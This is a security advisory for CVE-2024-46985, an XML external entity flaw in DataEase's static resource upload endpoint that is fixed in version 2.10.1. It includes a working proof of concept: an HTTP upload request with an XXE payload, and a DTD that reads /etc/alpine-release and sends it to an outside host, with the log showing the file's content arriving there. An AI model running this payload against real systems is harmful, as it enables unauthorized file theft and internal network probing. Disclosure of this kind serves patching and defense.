logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2024-46985 io.dataease:common

Package

Manager: maven
Name: io.dataease:common
Vulnerable Version: >=0 <2.10.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: 0.00151 pctl0.36251

Details

DataEase has an XML External Entity Reference vulnerability ### Impact There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading. 1. send request: ``` POST /de2api/staticResource/upload/1 HTTP/1.1 Host: dataease.ubuntu20.vm Content-Length: 348 Accept: application/json, text/plain, */* out_auth_platform: default X-DE-TOKEN: jwt User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn ------WebKitFormBoundary6OZBNygiUCAZEbMn Content-Disposition: form-data; name="file"; filename="1.svg" Content-Type: a <?xml version='1.0'?> <!DOCTYPE xxe [ <!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'> %EvilDTD; %LoadOOBEnt; %OOB; ]> ------WebKitFormBoundary6OZBNygiUCAZEbMn-- // 1.dtd的内容 <!ENTITY % resource SYSTEM "file:///etc/alpine-release"> <!ENTITY % LoadOOBEnt "<!ENTITY &#x25; OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>"> ``` 2. After sending the request, the content of the file /etc/alpine-release is successfully read ``` ::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 - ::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 - ``` Affected versions: <= 2.10.0 ### Patches The vulnerability has been fixed in v2.10.1. ### Workarounds It is recommended to upgrade the version to v2.10.1. ### References If you have any questions or comments about this advisory: Open an issue in https://github.com/dataease/dataease Email us at [wei@fit2cloud.com](mailto:wei@fit2cloud.com)

Metadata

Created: 2024-09-23T20:27:22Z
Modified: 2024-09-23T20:27:22Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-4m9p-7xg6-f4mm/GHSA-4m9p-7xg6-f4mm.json
CWE IDs: ["CWE-611"]
Alternative ID: GHSA-4m9p-7xg6-f4mm
Finding: F083
Auto approve: 1